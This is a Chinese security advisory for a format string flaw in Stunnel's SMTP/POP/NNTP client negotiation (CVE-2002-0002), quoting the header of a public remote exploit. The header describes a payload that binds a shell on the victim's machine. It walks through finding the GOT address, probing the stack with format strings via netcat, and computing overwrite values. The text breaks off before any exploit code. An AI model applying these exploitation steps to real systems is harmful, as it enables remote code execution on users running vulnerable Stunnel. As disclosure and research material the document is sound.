首页 -> 安全研究
安全研究
安全漏洞
STunnel客户端协商协议格式串溢出漏洞
发布日期:2003-01-15
更新日期:2003-01-22
受影响系统:
Stunnel Stunnel 3.19不受影响系统:
Stunnel Stunnel 3.18
Stunnel Stunnel 3.17
Stunnel Stunnel 3.16
Stunnel Stunnel 3.15
Stunnel Stunnel 3.21
- Mandrake Linux 8.1
- RedHat Linux 7.3 ia64
- RedHat Linux 7.3 x86
Stunnel Stunnel 3.22描述:
BUGTRAQ ID: 3748
CVE(CAN) ID: CVE-2002-0002
Stunnel是一款允许用户加密任意TCP会话连接的程序,能使非SSL加密应用程序和服务使用SSL加密。
Stunnel没有正确处理用户提供的输入,远程攻击者可以利用这个漏洞提供包含恶意格式字符串的请求给Stunnel服务,可能以Stunnel进程在系统上执行任意指令。
如果用户在客户端以'-n smtp'、'-n pop'、'-n nntp'选项运行Stunnel服务,由于对输入检查不充分,攻击者可以对其进行格式串攻击,精心提交恶意格式串数据可以覆盖堆栈任何内容,以Stunnel进程权限在系统上执行任意指令。
<*来源:Brian Hatch (bugtraq@ifokr.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=100949147823368&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Stunnel < 3.22 remote exploit
* by ^sq/w00nf - deltha [at] analog.ro
* Contact: deltha@analog.ro
* Webpage: http://www.w00nf.org/^sq/
*
* ey ./w00nf-stunnel contribs - kewlthanx :
* nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and \
not @ the end: bajkero *
* You also need netcat and format strings build utility (from my webpage)
* Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c
*
* . . .. ......................................... ...
* . ____ ____ _____ :.:.:
* : _ __/ __ \/ __ \____ / __/ :..
* :.. | | /| / / / / / / / / __ \/ /_ :
* ..:.. | |/ |/ / /_/ / /_/ / / / / __/ :
* :.: :.. |__/|__/\____/\____/_/ /_/_/ .
* : : :..
* :.: :............................................... .. . .
* T . E . A . M
*
* POC - Tested remotely on linux
* Stunnel is a program that allows you to encrypt arbitrary TCP connections inside \
SSL * Visit http://www.stunnel.org for details
*
* I didn't add a search function or bruteforce attack because the vulnerability \
does'nt allow you * to grab the remote stack.
*
* Description of this exploit:
* This exploit puts a payload on a specified port. When a remote user connects to \
your machine * using stunnel on the specified port, the exploit executes this \
payload and binds a shell to the * remote users machine on port 5074.
*
* Summary:
* Malicious servers could potentially run code as the owner of an Stunnel process \
when using * Stunnel's protocol negotiation feature in client mode.
*
* Description of vulnerability:
* Stunnel is an SSL wrapper able to act as an SSL client or server,
* enabling non-SSL aware applications and servers to utilize SSL encryption.
* In addition, Stunnel has the ability to perform as simple SSL \
encryption/decryption * engine. Stunnel can negotiate SSL with several other \
protocols, such as * SMTP's "STARTTLS" option, using the '-n protocolname' flag. \
Doing so * requires that Stunnel watches the initial protocol handshake before
* beginning the SSL session.
* There are format string bugs in each of the smtp, pop, and nntp
* client negotiations as supplied with Stunnel versions 3.3 up to 3.21c.
*
* No exploit is currently known, but the bugs are most likely exploitable.
*
* Impact:
* If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options
* in client mode ('-c'), a malicous server could abuse the format
* string bug to run arbitrary code as the owner of the Stunnel
* process. The user that runs Stunnel depends on how you start
* Stunnel. It may or may not be root -- you will need to check
* how you invoke Stunnel to be sure.
* There is no vulnerability unless you are invoking Stunnel with
* the '-n smtp', '-n pop', or '-n nntp' options in client mode.
* There are no format string bugs in Stunnel when it is running as an SSL
* server.
*
* Mitigating factors:
* If you start Stunnel as root but have it change userid to some other
* user using the '-s username' option, the Stunnel process will be
* running as 'username' instead of root when this bug is triggered.
* If this is the case, the attacker can still trick your Stunnel process
* into running code as 'username', but not as root.
* Where possible, we suggest running Stunnel as a non-root user, either
* using the '-s' option or starting it as a non-privileged user.
*
* Triggering this vulnerability - example for kidz:
* Obtain a shell account on to-be-hacked's server and perform the following \
commands: * sq@cal013102: whereis stunnel
* stunnel: /usr/sbin/stunnel
* change directory to where is stunnel
* Obtain vsnprintf's R_386_JUMP_SLOT:
* sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep \
printf * 08053470 R_386_JUMP_SLOT fprintf
* ---->080534a8 R_386_JUMP_SLOT vsnprintf
* 080535a4 R_386_JUMP_SLOT snprintf
* 08053620 R_386_JUMP_SLOT sprintf
* open 2 terminals
* in the first terminal make netcat connect to a port (eg 252525)
* sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l
* in the second terminal (remote) simulate attack
* ./stunnel -c -n smtp -r localhost:252525
* in the first terminal with nc insert a specially crafted string to grep eatstack \
value * AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|
* in the second terminal (remote) it will return the stack values and see at which \
position * 41414141 and 424242 appeared
* AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|
* 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|
* 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10
* try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return \
AAAABBBB4141414142424242 * put the address obtained with objdump in hex little \
endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08 * (a8+2=aa) and \
generate the decimal value of format string after you got the middle of nops value on \
stack 0xbffff89b * with build, a program attached to this exploit.
* ./build 080534a8 0xbffff89b 9
* adr : 134558888 (80534a8)
* val : -1073743717 (bffff89b)
* valh: 49151 (bfff)
* vall: 63643 (f89b)
* [